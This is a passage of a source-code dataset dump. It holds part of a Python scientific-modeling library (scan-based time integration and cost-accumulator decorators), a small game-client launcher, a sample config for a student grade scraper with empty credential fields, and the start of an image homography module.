-------\n SymbArray or List[SymbArray] (if `f` ≠ None):\n The result of `f`, evaluated at each time point.\n When `f` is not None, the output shape is the same as `scan`:\n\n - If `f` returns a single values, returns a symbolic array,\n of length equal to ``stoptidx - curtidx``.\n - If `f` returns multiple values, returns a list of symbolic arrays,\n each of length equal to ``stoptidx - curtidx``.\n The order of arrays matches the order in which `f` returns values.\n - If `f` is None, only the update dictionary is returned.\n\n Update dictionary:\n Can be passed as the `updates` parameter when compiling a function\n to update shared variables; the most common use case is to fill\n histories up to `stoptidx` - 1.\n The returned dictionary will include updates for:\n\n - The `_num_data` shared variable(s) underlying any unlocked history\n required to compute `f`.\n - The `_num_data` shared variable(s) underlying all additional\n unlocked histories listed in `histories`.\n - Any additional updates provided with the `updates` argument.\n (Which will have been converted from point-wise to iterated\n from `curtidx` to `stoptidx`.)\n\n Raises\n ------\n TypeError:\n - If `curtidx` or `stoptidx` cannot be casted to the index type of\n the histories.\n NotImplementedError:\n - If there are no unlocked histories.\n RuntimeError:\n - If the update dictionary is empty.\n - If the update dictionary has no dependency on any time index.\n (Or all such dependencies are to locked histories.)\n - If the unlocked histories are not synchronized.\n\n .. rubric:: For developers\n You can find a documented explanation of the function's algorithm\n in the internal documentation: :doc:`/docs/internal/Building an integration graph.ipynb`.\n \"\"\"\n # TODO: Replace curtidx by startidx everywhere appropriate\n # Default values\n if updates is None: updates = shim.get_updates()\n if curtidx is None: curtidx = self.curtidx_var\n if stoptidx is None: stoptidx = self.stoptidx_var\n\n if not all(np.can_cast(stoptidx.dtype, hist.tidx_dtype)\n for hist in self.statehists):\n raise TypeError(\"`stoptidx` cannot be safely cast to a time index. \"\n \"This can happen if e.g. a history uses `int32` for \"\n \"its time indices while `stoptidx` is `int64`.\")\n\n if len(list(self.unlocked_histories)) == 0:\n pass\n # raise NotImplementedError(\n # \"Cannot build a function iterating over time points if there \"\n # \"are no unlocked histories.\")\n try:\n assert( shim.get_test_value(curtidx) >= -1 )\n # Iteration starts at startidx + 1, and will break for indices < 0\n except AttributeError:\n # Unable to find test value; just skip check\n pass\n\n # First, declare a “anchor” time index\n # NB: num_tidx normally returns the earliest cur_tidx among unlocked state histories\n # If there are no state histories, or they are all locked, it returns self.t0idx\n # In both cases, this should constitute an appropriate anchor time index,\n # assuming that histories are synchronized (i.e. that all unlocked\n # state histories have the same cur_tidx). This is checked when\n # `num_tidx` is retrieved.\n anchor_tidx = self.num_tidx # NB: `self.num_tidx` asserts that histories are synchronized\n tidx_vars = [h._num_tidx for h in self.unlocked_histories] # The index variables to replace by anchor_tidx\n if not self.time.Index(anchor_tidx+1).in_bounds:\n raise RuntimeError(\n \"In order to compute a scan function, the model must \"\n \"have at least one uncomputed time point.\")\n # Build the substitution dictionary to convert all history time indices\n # to that of the model. This requires that histories be synchronized.\n anchor_tidx_typed = self.time.Index(anchor_tidx) # Do only once to keep graph as clean as possible\n tidxsubs = {h._num_tidx: anchor_tidx_typed.convert(h.time)\n for h in self.unlocked_histories}\n\n # Compute anchored expression graphs for `f`.\n if f:\n f_outputs = f(anchor_tidx_typed+1)\n if not isinstance(f_outputs, Sequence_):\n f_outputs = [f_outputs]\n else:\n f_outputs = []\n\n # Now we recover the global updates, and replace the multiple history\n # time indices by the time index of the model.\n output_hists = [h for h in self.history_set\n if h._latest_tap > 0 and not h.locked]\n if len(output_hists) + len(updates) + len(f_outputs) == 0:\n raise RuntimeError(\"No history has been updated symbolically and \"\n \"the list of updates is empty. \"\n \"Cannot build a scan graph.\")\n if any(h._latest_tap > 1 for h in output_hists):\n problem_hists = \", \".join(f\"{h.name} (Δk: {h._latest_tap})\"\n for h in output_hists if h._latest_tap > 1)\n raise NotImplementedError(\n \"`map_over_time` requires that symbolic \"\n \"updates only look forward one time step.\\nProblematic \"\n f\"histories: {problem_hists}\")\n # The reason for that is that it's not clear how we should\n # deal with forward taps >1: the scan still iterates 1 step at\n # a time, so should we shift all time points back by k-1 ?\n # More likely, a user would expect that we use Theano's support\n # for forward taps – but then what do we do with other,\n # uncomputed histories ? In short, it starts breaking our\n # fundamental causality assumption.\n\n ## Construction of outputs_info (init vals & taps) ##\n\n # Initialize the `outputs_info` list for the scan step with the\n # outputs of `f`. Since these don't require taps, we create dummy taps\n # for them. (See https://github.com/aesara-devs/aesara/issues/500)\n # C.f. following `if len(negtaps) == 0` below.\n\n outputs = f_outputs.copy()\n outputs_info = []\n output_taps_replace = [] # Flattened list of taps. Used to construct the\n # substitution dict in onestep\n tap_names = [] # Names to assign to tap variables. This must be done\n # inside `onestep`, when the tap variables are accessible\n for i, o in enumerate(f_outputs):\n outputs_info.append(None)\n # init_val = shim.ones(o.shape, dtype=o.dtype, symbolic=True)\n # output_taps_replace.append(init_val)\n # name = getattr(o, 'name', None)\n # if name is None: name = f\"{getattr(f, '__name__', 'f')}.{i}\"\n # init_val.name = f\"{name}[scan init, dummy]\"\n # tap_names.append(f\"{name}[k-1]\")\n # outputs_info.append({'initial': init_val, 'taps': [-1]})\n\n # Collect the information for the variables that are iterated forward\n # We split taps into forward/positive (> 0) and backward/negative (≤ 0).\n # Backward taps will become the `outputs_info` variable to scan.\n # Forward taps define the update function; we only allow one forward tap.\n # We only need the backward taps of histories which also have forward taps:\n # since the others don't change during iteration, we can keep indexing\n # directly into their `_num_data`.\n\n # Create the list of output variables for the scan step.\n # Negative tap variables (which appear within the graph of positive\n # tap variables) are substituted in by the `onestep` function below.\n # `clone` replaces time index vars by expressions depending on the anchor.\n # outputs = [shim.graph.clone(h[h._num_tidx+1], replace=tidxsubs)\n outputs += [h._taps[h.time.Index.Delta(1)] for h in output_hists]\n for o, h in zip(outputs[len(f_outputs):], output_hists):\n o.name = f\"{h.name}[k] (anchored)\" # Corresponding var inside scan is named \"{h.name}[k]\"\n\n # Construct the outputs info from the negative taps.\n # NB: Initial data must be contiguous, even if negative taps are not,\n # so taps [-3, -1] still require [k-3, k-2, k-1, k], where k is the\n # current time index.\n # If there are no negative taps, we just use the current value as\n # initialization (equivalent to having a tap of 0).\n # IMPORTANT: In Theano's tap indexing, taps are relative _to the time\n # point **being** computed_, while in Sinn, they are relative _to the\n # lastest **computed** time point_. This means that we need to\n # subtract 1 from each tap to construct `outputs_info`.\n for h in output_hists:\n negtaps = [tapk for tapk in sorted(h._taps) if tapk <= 0]\n if len(negtaps) == 0:\n # History is not needed to evaluate any graph.\n # In theory there should be no need for an init val and the\n # line below should be the most appropriate\n # > outputs_info.append({'taps': None})\n # However, scan doesn't behave quite correctly with tapless variables\n # (see https://github.com/aesara-devs/aesara/issues/500), so\n # we use the workaround of defining dummy variables.\n # C.f. `for i, o in enumerate(f_outputs):` above\n outputs_info.append(None)\n # init_val = shim.ones(h.shape, dtype=h.dtype, symbolic=True)\n # output_taps_replace.append(init_val)\n # init_val.name = f\"{h.name}[scan init, dummy]\"\n # tap_names.append(f\"{h.name}[k-1]\")\n # outputs_info.append({'initial': init_val, 'taps': [-1]})\n else:\n scantaps = [k-1 for k in negtaps]\n init_length = -min(scantaps)\n assert init_length > 0, \"create scan (map_over_time) -> output_info -> init length must be positive\"\n # NB: This will add any intermediate tap to the history's _taps;\n # I'm undecided on whether this is desired or not.\n # NB: We take care here that the instances in output_taps_replace\n # are the same ones as in init_vals\n # init_vals = [shim.graph.clone(h[h._num_tidx+Δk], replace=tidxsubs)\n init_vals = [h._taps[h.time.Index.Delta(Δk)]\n # NB: The use of _taps[…] is temporary, to help detect if a required tap is not already calculed (almost always, all previous taps should already have been calculated)\n for Δk in range(-init_length+1, 1)]\n if scantaps == [-1]:\n # To avoid requiring extra dimensions when no taps are used,\n # Theano special-cases the case with only the -1 tap and\n # removes the outer dimension.\n init_val = init_vals[0]\n else:\n init_val = shim.stack(init_vals)\n init_val.name = f\"{h.name}[scan init]\"\n init_tap_idx = [k+init_length for k in scantaps]\n assert init_tap_idx[0] == 0, \"Bug in index arithmetic for scan outputs_info\"\n output_taps_replace.extend([init_vals[Δk] for Δk in init_tap_idx])\n # Only substitute anchor tidx until after we've added to output_taps_replace,\n # so that scan can still sub the tap vars\n # init_vals = [shim.graph.clone(v, replace=tidxsubs) for v in init_vals]\n # # Add names for debugability\n # for iv, Δk in zip(init_vals, scantaps):\n # iv.name = f\"{h.name}[k-{abs(Δk)}] (anchored)\"\n tap_names.extend(f\"{h.name}[k-{abs(Δk)}]\" for Δk in scantaps)\n # Add to outputs_info\n outputs_info.append(\n {'initial': shim.graph.clone(shim.graph.clone(init_val,\n replace=tidxsubs), # All indices -> anchor_tidx\n replace={anchor_tidx: curtidx}), # anchor_tidx -> symbolic index used in function\n 'taps': scantaps})\n\n # # Replace all time indices in updates by expressions depending on anchor\n # updates = {k: shim.graph.clone(g, replace=tidxsubs)\n # for k,g in updates.items()}\n # # Ensure that we actually do have a time dependence somewhere in the\n # # graph we send to scan\n # all_exprs = chain(outputs, output_taps_replace, updates.values())\n # if not set(shim.graph.symbolic_inputs(all_exprs)) & set(tidx_vars):\n # # | set([anchor_tidx])) ):\n # raise RuntimeError(\"The updates dictionary has no dependency on \"\n # \"any time index. Cannot build a scan graph.\")\n all_exprs = chain(outputs, output_taps_replace, updates.values())\n # The test below could be used if anchor_tidx were a brand new variable, and not just self.num_tidx (which can be added by `accumulate`)\n # assert not set(shim.graph.symbolic_inputs(all_exprs)) & set([anchor_tidx]), \\\n # \"The anchor_tidx must not be substituted into expressions before the scan step is constructed, and should not be used in expressions outside the `scan` (use the symbolic `curtidx` in the latter case).\"\n\n ## Definition of the scan step ##\n\n # Grab the list of shared vars to pass as non_sequences\n # NB: Providing the list of shared variables is not required, but\n # supposedly helps keep the graph cleaner and more efficient – which\n # might be especially beneficial with complex history update functions.\n # (https://theano-pymc.readthedocs.io/en/latest/library/scan.html?highlight=scan#using-shared-variables-gibbs-sampling)\n # I don't know how much of a difference this makes in practice, since\n # I generally don't see a difference in the output of debug print.\n shared_vars_in_graph = [\n v for v in shim.graph.shared_inputs(updates.values())\n if v is not anchor_tidx] # anchor_tidx is replaced inside onestep\n n_shared_vars = len(shared_vars_in_graph)\n\n # Now we build the step function that will be passed to `scan`.\n # NB: Keyword args are used to pass variables into onestep's local scope.\n # Although not strictly necessary, it's better form and avoids some\n # edge cases with scopes and function closures.\n def onestep(tidx, *args,\n outputs=outputs, output_taps_replace=output_taps_replace,\n updates=updates, output_hists=output_hists, tap_names=tap_names,\n tidxsubs=tidxsubs, n_shared_vars=n_shared_vars, n_foutputs=len(f_outputs)):\n assert len(args) == len(output_taps_replace) + n_shared_vars, \\\n \"Unexpected number of scan arguments. Unpacking relies on alignment of `args`, and thus will almost certainly fail\"\n if config.debug_level >= config.DebugLevels.GRAPH_PRINTS:\n tidx = shim.print(tidx, \"tidx in scan\")\n # Construct the replace dict to substitute the scan vars passed in *args\n output_taps = args[:len(output_taps_replace)]\n taps_replace_dict = {orig: new for orig, new\n in zip(output_taps_replace, output_taps)}\n # Replace anchored `anchor_tidx` by the unanchored `tidx` in the tidx substitution dictionary\n tidxsubs = {k: shim.graph.clone(v, replace={anchor_tidx: tidx})\n for k, v in tidxsubs.items()}\n tidxsubs[anchor_tidx] = tidx\n # Construct the output by substituting the scan args\n # NB: It's important to do the taps substitution before the tidx\n # substitutions, because once the tidcs are changed, the subgraphs\n # corresponding to taps no longer have the same identity.\n step_outputs = [shim.graph.clone(shim.graph.clone(o,\n replace=taps_replace_dict),\n replace=tidxsubs) # Convert all hist anchors to expressions relative the unanchored tidx\n for o in outputs]\n step_updates = OrderedDict(\n (k, shim.graph.clone(shim.graph.clone(g,\n replace=taps_replace_dict),\n replace=tidxsubs) )\n for k, g in updates.items())\n # Add var names for easier debugging\n f_outputs = step_outputs[:n_foutputs]\n h_outputs = step_outputs[n_foutputs:]\n for o, o_anchored in zip(f_outputs, outputs):\n name = getattr(o_anchored, 'name', None)\n if name:\n o.name = name.replace(\"(anchored)\", \"\").strip() + \"[k]\"\n for o, h in zip(step_outputs, output_hists):\n o.name = f\"{h.name}[k]\"\n assert len(output_taps) == len(tap_names)\n for o, tap_name in zip(output_taps, tap_names):\n o.name = tap_name\n # Assert that all tap variables appear in the final computational graphs\n symbinputs = shim.graph.symbolic_inputs(step_outputs + list(step_updates.values()))\n # dummy_taps = [tap for orig_tap, tap in taps_replace_dict.items()\n # if orig_tap.name and \"[scan init, dummy]\" in orig_tap.name]\n missing_taps = [tap for tap in output_taps if tap not in symbinputs]\n # missing_taps = [tap for tap in output_taps if tap not in symbinputs + dummy_taps]\n # spurious_taps = [tap for tap in dummy_taps if tap in symbinputs]\n if missing_taps:\n raise RuntimeError(\n \"Model.map_over_time.onestep: The \"\n \"following taps don't appear in the scan's iteration:\\n\"\n f\"{missing_taps}\\nMost likely a graph substitution failed; \"\n \"this could be a bug in sinn.Model.\")\n # if spurious_taps:\n # raise RuntimeError(\n # \"Model.map_over_time.onestep: The \"\n # \"following dummy taps were created within map_over_time() \"\n # \"but somehow appeared in the scan's iteration:\\n\"\n # f\"{spurious_taps}\\nThis is almost certainly a bug in sinn.Model.\")\n # Assert that for output histories (those with taps, and thus those\n # which a) slide forward and b) have unfilled histories), only the\n # taps appear in the computational graphs.\n unsubstituted_hists = [h for h in output_hists if h._num_data in symbinputs]\n if unsubstituted_hists:\n raise RuntimeError(\n \"Model.map_over_time.onestep: unlocked \"\n \"unlocked histories are integrated foward by scan; they \"\n \"should only appear in scan's computational graphs as taps. \"\n \"Yet the ones below also appear through their underlying \"\n \"shared variable `_num_data`; since `_num_data` is only \"\n \"filled _after_ the scan, this strongly suggests that \"\n \"something went wrong when we construct the scan graph.\")\n # Return outputs and updates\n if config.debug_level >= config.DebugLevels.GRAPH_PRINTS:\n step_outputs = [shim.print(o, f\"scan output ({o.name})\") for o in step_outputs]\n return step_outputs, step_updates\n\n # Check that there are no missing inputs: Theano's error messages\n # for this are nasty. We want to catch the mistake first and print\n # better information\n all_exprs = chain(outputs, output_taps_replace, updates.values())\n symbinputs = shim.graph.pure_symbolic_inputs(all_exprs)\n if symbinputs:\n raise shim.graph.MissingInputError(\n \"The following purely symbolic variables are present in the \"\n \"computational graph. They were probably added accidentally; \"\n \"the only supported symbolic variables are shared variables.\\n\"\n f\"Pure symbolic inputs: {symbinputs}.\")\n\n ## Assembly into `scan` ##\n\n # Now we can construct the scan graph.\n # NB: tidx will be replaced by anchor_tidx (i.e. num_tidx), so it should be k-1\n # if we want to compute k. Ergo, tidx range must go from curtidx to stoptidx-1.\n with catch_warnings():\n # Theano still uses np.bool somewhere; there's nothing we or the user can do\n filterwarnings(\"ignore\",\n \"`np.bool` is a deprecated alias for the builtin `bool`\",\n DeprecationWarning)\n outs, upds = shim.scan(onestep,\n sequences = [shim.arange(curtidx, stoptidx,\n dtype=self.tidx_dtype)],\n outputs_info = outputs_info,\n non_sequences=shared_vars_in_graph,\n name = f\"scan ({self.name})\",\n return_list=True\n )\n\n ## Final repackaging: history outputs moved to updates dict ##\n\n # We return updates to the history data with the update dictionary; this\n # seems more intuitive (the number of outs matches the number of values\n # returned by `f`) and also matches the old logic, so doesn't require\n # changes outside this method.\n # To do this, we create a new update dictionary for the shared data\n # underlying updated histories, applying the values in `outs`, and\n # combine it with `upds`.\n\n if outs is None: outs = []\n assert len(outs) == len(f_outputs) + len(output_hists)\n # curtidx, stoptidx may be involved in arithmetic ops, but they should have one symbolic input each\n inp_curtidx = shim.graph.pure_symbolic_inputs(curtidx)\n if len(inp_curtidx) != 1:\n warn(\"When creating the `scan`, we expect the symbolic curtidx (start index of the scan) \"\n f\"to depend on one purely symbolic input, but in fact it depends on {len(inp_curtidx)}.\")\n inp_stoptidx = shim.graph.pure_symbolic_inputs(stoptidx)\n inp_stoptidx = [i for i in inp_stoptidx if not any(i is ic for ic in inp_curtidx)]\n if len(inp_curtidx) != 1:\n warn(\"When creating the `scan`, we expect the symbolic stoptidx (stop index of the scan) \"\n f\"to depend on one purely symbolic input, but in fact it depends on {len(inp_stoptidx)}.\")\n if len(inp_curtidx) == 1 and len(inp_stoptidx) == 1:\n # Test values for the assertions\n # TODO?: Use actual test values ?\n # inp = {inp_curtidx[0]: self.num_tidx, inp_stoptidx[0]: self.num_tidx+6}\n inp = {inp_curtidx[0]: 0, inp_stoptidx[0]: 5}\n else:\n inp = None\n nsteps = stoptidx-curtidx\n hist_updates = [] # Will store update dicts for each history\n for h, out in zip(output_hists, outs[len(f_outputs):]):\n outslc = slice(h._num_tidx + 1, h._num_tidx + 1 + nsteps)\n # outslc = slice(shim.graph.clone(outslc.start, replace=tidxsubs),\n # shim.graph.clone(outslc.stop, replace=tidxsubs))\n # Sanity check: outslc resolves to a non-empty slice of same shape as out\n evalslc = None if not inp else shim.eval(outslc, givens=inp, if_too_costly='ignore')\n # # DEBUG >>>>>\n # print([h.name for h in self.unlocked_histories])\n # print(shim.eval(out, givens=inp, max_cost=None))\n # import theano\n # try:\n # gg = shim.grad(out.sum(), )[0][:8]\n # ff = shim.graph.compile(list(inp.keys()), gg, mode='guard:nan,inf,big')\n # print(ff(0, 5))\n # except theano.gradient.DisconnectedInputError:\n # pass\n # # <<<<< DEBUG\n if evalslc:\n assert evalslc.stop > evalslc.start, f\"Model.map_over_time: negative or zero length output slice for history {h.name}. \" \\\n f\"After the scan op, the generated data for this history would be of shape {out.shape.eval(inp)}, but the time slice (first time dimension) has end points\\nStart: {evalslc.start}\\nStop: {evalslc.stop}\"\n try:\n outlen = shim.eval(out.shape[0], givens=inp)\n except shim.graph.TooCostly:\n pass\n else:\n if outlen and evalslc.stop - evalslc.start != outlen:\n raise AssertionError(\n f\"After the scan op, the generated data for the history '{h.name}' would be of shape {out.shape.eval(inp)}, \"\n f\"but the time slice (first time dimension) has end points\\nStart: {evalslc.start}\\nStop: {evalslc.stop}\")\n # Add updates for this history\n hist_updates.append(h._get_symbolic_update(outslc, out))\n # Combine all updates into one dict\n # Variables targeted by update dictionaries should be pairwise disjoint\n repeated_upds = set().union(\n *(set(a) & set(b) for a,b in combinations((upds, *hist_updates), 2)))\n if repeated_upds:\n raise AssertionError(\"There are multiple updates targeting the \"\n f\"following variables:\\n{repeated_upds}\")\n upds = dict(chain(upds.items(), *(d.items() for d in hist_updates)))\n\n # Remove history updates from `outs`, since they are now in `upds`\n outs = outs[:len(f_outputs)]\n\n # Remove undesired history updates (typically intermediate histories)\n excl_hists = (h for h in self.history_set if h not in histories)\n excl_upds = set(chain(*((h._num_tidx, *(h._num_data if isinstance(h._num_data, tuple) else [h._num_data]))\n for h in excl_hists)))\n for k in list(upds.keys()):\n if k in excl_upds:\n del upds[k]\n\n # Any remaining anchor tidx should map to curtidx; replace by the symbolic `curtidx` in the tidx substitution dictionary\n tidxsubs = {anchor_tidx: curtidx,\n **{k: shim.graph.clone(v, replace={anchor_tidx: curtidx})\n for k, v in tidxsubs.items()}}\n outs = [shim.graph.clone(v, replace=tidxsubs) for v in outs]\n upds = {k: shim.graph.clone(v, replace=tidxsubs)\n for k,v in upds.items()}\n\n # Assert that none of the anchor time indices are left as inputs in the graph\n # Time indices should be functions of `curtidx` or `stoptidx` only.\n disallowed_tidx_inputs = (({h._num_tidx for h in self.history_set if h.locked} | {anchor_tidx})\n & set(shim.graph.symbolic_inputs(chain(outs, upds.values()))))\n if disallowed_tidx_inputs:\n raise RuntimeError(\n \"The following anchor time indices remain in update scan graph. \"\n \"These should have been replaced by the unanchored time index \"\n \"variables created within Model.map_over_time, \"\n \"since they are not otherwise updated as the scan iterates \"\n f\"over time points.\\n{disallowed_tidx_inputs}\")\n # out_upds = {h._num_data: shim.set_subtensor(h._num_data[curtidx:stoptidx], out)\n # for h, out in zip(output_hists, outs)}\n if outs:\n if len(outs) == 1:\n outs = outs[0]\n return outs, upds\n else:\n return upds\n\n # ---------------------------------------------\n # Helper decorators for building cost functions\n\n def accumulate_with_offset(self, start_offset, init_discard=0):\n \"\"\"\n .. Note:: In most cases, it will is easier to use one of the helper functions,\n either `accumulate` or `static_accumulate`.\n\n Construct a cost graph from a pointwise cost function.\n A function is “pointwise” if it can be computed entirely from the histories\n (i.e. it does not depend on its own value at other time points).\n\n For a cost function ``f``, the resulting graph corresponds to\n\n .. math::\n\n \\sum_{i=t0}^tn f(i)\n\n where *t0* and *tn* are respectively ``curtidx+start_offset``\n and ``curtidx+start_offset+batch_size``.\n\n The returned function r takes two arguments, ``curtidx`` and ``batch_size``\n\n **Side-effects**\n State updates are added to the global update dictionary.\n\n Parameters\n ----------\n start_offset: Axis index delta | int\n Index offset relative to the current time index.\n There are mainly two intended values:\n - 1: Evaluate one time index forward, relative to the current time.\n This will trigger all required history updates to integrate\n the model.\n Equivalent to `accumulate`.\n - 0: Evaluate at the current time index. This should not trigger\n any history updates. This means dependencies on parameters are\n likely lost.\n Equivalent to `static_accumulate`.\n Note that we don't have a clear use case for values ≥ 2, and do not\n support them at this time.\n init_discard: Axis index delta | int\n When computing the total cost, discard this many initial points.\n This can be used to integrate the model symbolic for some number of\n steps before starting the accumulator. If the resulting cost will be\n differentiated, it's usually a good idea to include such steps to\n ensure that BPTT produces sensible gradient estimates.\n\n Raises\n ------\n ValueError\n : If the wrapped function has variadic arguments (*args or **kwargs).\n : If the wrapped function does not have 1 or 2 arguments.\n RuntimeError\n : (when calling the returned accumulator) if the histories on which.\n the accumulator depends do not have at least one non-computed time point.\n\n Warns\n -----\n UserWarning\n : If the wrapped function has 2 arguments and the first is not 'self'.\n\n .. Todo:: Add a mechanism for optionally advancing histories at the\n same time a value is accumulated.\n \"\"\"\n def wrapped_acc(f):\n # Inspect the signature of `f` to see if there is a `self` argument\n # If so, attach the model to it.\n # This is similar to the same pattern used in histories.HistoryUpdateFunction\n sig = inspect.signature(f)\n if any(p.kind in (inspect._ParameterKind.VAR_POSITIONAL,)\n #inspect._ParameterKind.VAR_KEYWORD)\n for p in sig.parameters.values()):\n raise ValueError(\"Sinn accumulators don't support variadic \"\n \"arguments at this time.\")\n extra_required_args = [p for p in list(sig.parameters.values())[2:]\n if p.default is not inspect._empty]\n if extra_required_args:\n raise ValueError(\n f\"The function {func.__qualname__} (signature: {sig}) \"\n \"should require at most two arguments (typically ``(model, tidx)``), \"\n f\"but it also requires {extra_required_args}.\")\n if len(sig.parameters) == 1:\n # Do not include `self`\n firstarg = ()\n elif len(sig.parameters) >= 2:\n first_arg_name = next(iter(inspect.signature(f).parameters.keys()))\n if first_arg_name not in (\"self\", \"model\"):\n warn(\"If an accumulator function accepts two arguments, \"\n \"arguments, the first should be 'self' or 'model'. \"\n f\"Received '{first_arg_name}'.\")\n firstarg = (self,)\n else:\n raise ValueError(\n f\"The function {func.__qualname__} (signature: {sig}) \"\n \"should accept two arguments (typically ``(model, tidx)``), \"\n f\"but is defined with {len(sig.parameters)}.\")\n # Create the accumulator function\n def accumulated_function(curtidx, batchsize):\n # NB: batch_size is actually batch_size+init_discard – i.e., the number of time points summed is batchsize-init_discard\n # Ensuring this works correctly with shared variables would require more testing\n assert shim.is_pure_symbolic(curtidx) and shim.is_pure_symbolic(batchsize)\n # time index anchor\n numtidx = self.num_tidx # NB: Must be the same as used to create\n # anchor_tidx in map_over_time\n if not self.time.Index(numtidx+start_offset).in_bounds:\n raise RuntimeError(\n \"In order to compute a scan function, the model must \"\n f\"have at least {start_offset} uncomputed time point.\")\n # Accumulator variable for the cost. Initialized to zero.\n # cost = shim.shared(np.array(0, dtype='float64'), f\"accumulator ({f.__name__})\")\n # Build the computational graph for the step update of the cost\n # shim.add_update(cost, cost + f(*firstarg, self.time.Index(numtidx+start_offset)))\n # f(…) triggers required history update computations\n @wraps(f)\n def fwrap(tidx):\n res = f(*firstarg, self.time.Index(numtidx+start_offset))\n res.name = f\"{f.__name__}\" # TODO: As below, allow setting a different var name\n return res\n # Convert the step update to an iteration\n # TODO: Add mechanism for optionally also advancing history\n cost, updates = self.map_over_time(\n fwrap, shim.get_updates(), curtidx, curtidx+batchsize) \n if isinstance(cost, Sequence_): # NB: `map_over_time` unpacks length one lists, so cost must have at least length 2\n raise RuntimeError(\"An accumulated function should return \"\n f\"exactly one value; received {len(cost)}.\")\n # Return the final cost, along with the rest of the updates\n # Caller can decide if they want to apply updates or discard them\n # cost_total = updates.pop(cost)\n # shim.remove_update(cost)\n shim.add_updates(updates)\n Δ = getattr(init_discard, 'plain', init_discard)\n res = cost[Δ:].sum()\n res.name = f\"accumulated_{f.__name__}\" # TODO: Allow setting different var name (e.g. \"loss\")\n return res, shim.get_updates()\n # Attach the offset, so functions can determine by how much they\n # need to shift arguments\n accumulated_function.start_offset = start_offset\n # Attach the original function, so we can use it for serialization\n accumulated_function.__func__ = f\n # Define name and docstring of the new function based on the original\n accumulated_function.__name__ = f\"accumulated_{f.__name__}\"\n accumulated_function.__doc__ = (\"This function accumulates (sums) the values \"\n f\"of the function `{f.__name__}` from \"\n f\"`curtidx+{start_offset}` to `curtidx+{start_offset}+stoptidx`.\\n\\n\"\n \"--------------------------------------------\\n\"\n f\"Docstring for {f.__name__}:\\n\\n{f.__doc__}\")\n return accumulated_function\n return wrapped_acc\n\n def accumulate(self, f=None, init_discard=0):\n \"\"\"\n Accumulate (sum) the function f. Histories are integrated along\n with the accumulator.\n\n If you need a differentiable cost function, this is almost always\n the decorator to use.\n\n Intended uses:\n - Training a model with back propagation through time.\n\n Example\n -------\n Mean-squared error between a target `y` and the variable `x` of a model\n `model`.\n Note the use of round brackets (`model.x(tidx)`) to ensure that the\n update computations for `x` are triggered.\n >>> model = Model(...)\n >>> y = np.array(...)\n >>> @model.accumulate\n >>> def mse(tidx):\n >>> return (y[tidx] - model.x(tidx))**2\n >>> @model.accumulate(init_discard=2) # Discard the first two time points\n >>> def mse2(tidx):\n >>> return (y[tidx] - model.x(tidx))**2\n Both examples will integrate the same date points, but the result\n returned by ``mse2`` will include two terms less than ``mse``.\n \"\"\"\n if f is None:\n return partial(self.accumulate, init_discard=init_discard)\n acc_f = self.accumulate_with_offset(1, init_discard)(f)\n acc_f._accumulator = 'accumulate'\n return acc_f\n\n def static_accumulate(self, f=None, init_discard=0):\n \"\"\"\n Accumulate (sum) the function f without updating histories.\n In `f`, use [] indexing to make sure you don't accidentally\n trigger computations.\n\n .. Warning:: Since update computations are not triggered,\n any dependencies of those computations on parameters\n will not show up in accumulator's graph.\n\n Intended for:\n - Evaluating a function on an already computed history.\n - Optimizing the evolution of a latent variable.\n\n *Not* intended for:\n - Training the model dynamics.\n \"\"\"\n if f is None:\n return partial(self.static_accumulate, init_discard=init_discard)\n acc_f = self.accumulate_with_offset(0, init_discard)(f)\n acc_f._accumulator = 'static_accumulate'\n return acc_f\n","sub_path":"sinn/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":194199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244066110","text":"import argparse\nfrom .game import Game\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--address\", dest=\"address\", help=\"IP Address\", default=\"0.0.0.0\")\nparser.add_argument(\n \"--tcpport\", dest=\"tcp_port\", help=\"Listening tcp port\", default=\"1234\"\n)\nparser.add_argument(\n \"--udpport\", dest=\"udp_port\", help=\"Listening udp port\", default=\"1234\"\n)\nparser.add_argument(\n \"--udpaddr\", dest=\"udp_addr\", help=\"UDP Address to identify by\", default=\"1235\"\n)\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n game = Game(args.address, args.tcp_port, args.udp_port, args.udp_addr)\n game.run()\n","sub_path":"CollegiateHighGame/client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"97937468","text":"#!/usr/bin/env python\n\n# Username\nLOGINID = ''\n# Pincode\nPIN = ''\n# Optional feide login: Requires feide.conf. Copy feide_sample\nFEIDE = False\n# Regex of the different course codes which you want to include\nCOURSEREGEX = 'MS\\d{3}A|INF\\d{4}NSA' # Change me to your courses. Normal regex\n# The schools which should be scraped.\nSCHOOLS = ['HiOA', 'UiO'] # Case sensitive\n\n# The url to studweb\nBASE_URL = \"https://www.studweb.no/as/WebObjects/studentweb2?inst=\"\n# Custom user agent\nUSER_AGENT = [('User-agent', 'Mozilla/5.0 (Windows NT 6.0; rv:27.0) Gecko/20100101 Firefox/27.0')]\n# To limit to the courses specified in the regex or not\nLIMITCOURSE = False\n# Menu collapsed (its a plus)\nMENUCOL = \"[+][IMG]\\xa0\"\n# Menu expanded\nMENUEXP = \"[ ][IMG]\\xa0\"\n# Hide failed classes\nHIDEFAILED = True\n# Print to stdout\nVERBOSE = True\n\n# Notifications\n# Send notification when points are updated\nNOTIFY = True\n# Service to notify your phone with. Valid types are 'nma' 'prowl', and 'pushover'\n# for Notify My Android, Prowl, and Pushover clients, respectively.\n# Set to 'email' if email notifications should be used\nNOTIFY_SERVICE = \"nma\"\n# API key for that service\nNOTIFY_APIKEY = \"\"\n# Email notifications\n# SMTP server\nSMTP_SERVER = \"smtp.gmail.com\"\n# SMTP port 587 is default with TLS\nSMTP_PORT = 587\n# SMTP username\nSMTP_USERNAME = \"\"\n# SMTP password (google: App spesific passwords work)\nSMTP_PASSWORD = \"\"\n# Senders email address\nEMAIL_FROM = \"\"\n# Recipients email address\nEMAIL_TO = \"\"\n","sub_path":"config_sample.py","file_name":"config_sample.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472642298","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .utils import create_meshgrid\nfrom .conversions import transform_points\n\n\n__all__ = [\n \"HomographyWarper\",\n \"homography_warp\",\n]\n\n\n# layer api\n\nclass HomographyWarper(nn.Module):\n 